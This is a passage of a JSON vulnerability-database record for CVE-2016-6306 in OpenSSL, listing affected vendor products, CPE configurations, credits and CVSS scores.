"version": "12.0.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.2" }, { "model": "jabber for iphone and ipad", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1.1" }, { "model": "prime network registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.0" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.2" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "telepresence video communication server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x8.8.3" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.16" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.4.1" }, { "model": "series digital media players 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "multicast manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.3" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "big-ip wom hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "big-ip link controller build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.66.204.442" }, { "model": "secure access control system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.8.0.32.8" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "big-ip psm hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "webex node for mcs", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mcu", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.5(1.89)" }, { "model": "management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "videoscape anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.2" }, { "model": "big-ip asm hf9", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "big-ip afm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "video distribution suite for internet streaming", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.003(002)" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.31" }, { "model": "iworkflow", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.0" }, { "model": "big-ip dns hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "sterling connect:direct for hp nonstop", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.3" }, { "model": "project openssl 1.0.2c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip asm build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.110.104.180" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.13" }, { "model": "big-ip gtm hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip asm hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.01.14.628" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.400" }, { "model": "big-ip apm build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.40.1.256" }, { "model": "big-ip afm hf9", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89610" }, { "model": "expressway series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x8.8.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.12" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3" }, { "model": "prime network", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "431" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "big-ip aam hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.1" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.14" }, { "model": "big-ip analytics hf9", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.26" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "big-ip websafe hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "telepresence system ex series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.3" }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "network analysis module 6.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "big-ip ltm build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.01.14.628" }, { "model": "mxe series media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "35000" }, { "model": "project openssl 1.0.2b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip afm build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.66.204.442" }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.17.3" }, { "model": "videoscape control suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "ip series phones vpn feature", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800-0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.9" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.3" }, { "model": "big-ip pem hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "big-ip afm hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "big-ip aam hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0.0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.27" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.17" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.18" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.2.0.0" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.5" }, { "model": "big-ip aam hf9", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "email gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.6.406-3402.103" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.1.1" }, { "model": "unified meetingplace 8.6mr1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tapi service provider", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70002.9" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.2" }, { "model": "big-ip asm hf8", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip pem hf11", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1.0" }, { "model": "spa525g 5-line ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.1.0" }, { "model": "secure access control system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.22" }, { "model": "unified ip conference phone for third-party call control 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8831" }, { "model": "unified ip series phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79000" }, { "model": "big-ip ltm hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "spa232d multi-line dect analog telephone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "nexus series fabric switches aci mode", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.6" }, { "model": "big-ip link controller hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0.0" }, { "model": "big-iq security hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.4" }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip ltm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.3.2" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway 7.6.405h1157986", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "big-ip link controller hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1" }, { "model": "project openssl 1.0.1l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.7" }, { "model": "big-ip apm build 685-hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "registered envelope service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip pem hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0.0" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.4" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70003.5.12.23" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "big-ip analytics hf10", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.4" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1.0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.15" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.2" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip websafe", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1" }, { "model": "unified meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "big-ip websafe hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "big-ip pem hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.1" }, { "model": "unified contact center express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "big-ip pem hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "webex meetings server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.1.30" }, { "model": "big-iq device hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.4" }, { "model": "big-ip gtm build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.66.204.442" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip afm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.13" }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.402" }, { "model": "big-ip apm build", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "12.01.14.628" }, { "model": "project openssl 1.0.1p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null } ], "sources": [ { "db": "BID", "id": "93153" }, { "db": "JVNDB", "id": "JVNDB-2016-004992" }, { "db": "NVD", "id": "CVE-2016-6306" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:hp:icewall_sso:10.0:*:*:*:certd:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:hp:icewall_mcrp:3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:hp:icewall_sso:10.0:*:*:*:dfw:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:hp:icewall_sso_agent_option:10.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:hp:icewall_federation_agent:3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:novell:suse_linux_enterprise_module_for_web_scripting:12.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "cpe_name": [], "versionEndIncluding": "4.1.2", "versionStartIncluding": "4.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "cpe_name": [], "versionEndExcluding": "0.12.16", "versionStartIncluding": "0.12.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "cpe_name": [], "versionEndExcluding": "0.10.47", "versionStartIncluding": "0.10.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "cpe_name": [], "versionEndExcluding": "6.7.0", "versionStartIncluding": "6.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:lts:*:*:*", "cpe_name": [], "versionEndExcluding": "4.6.0", "versionStartIncluding": "4.2.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:-:*:*:*", "cpe_name": [], "versionEndIncluding": "5.12.0", "versionStartIncluding": "5.0.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-6306" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "148521" }, { "db": "PACKETSTORM", "id": "148525" }, { "db": "PACKETSTORM", "id": "148524" } ], "trust": 0.4 }, "cve": "CVE-2016-6306", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Medium", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 4.3, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-6306", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "HIGH", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitabilityScore": 2.2, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, { "attackComplexity": "High", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 5.9, "baseSeverity": "Medium", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-6306", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": 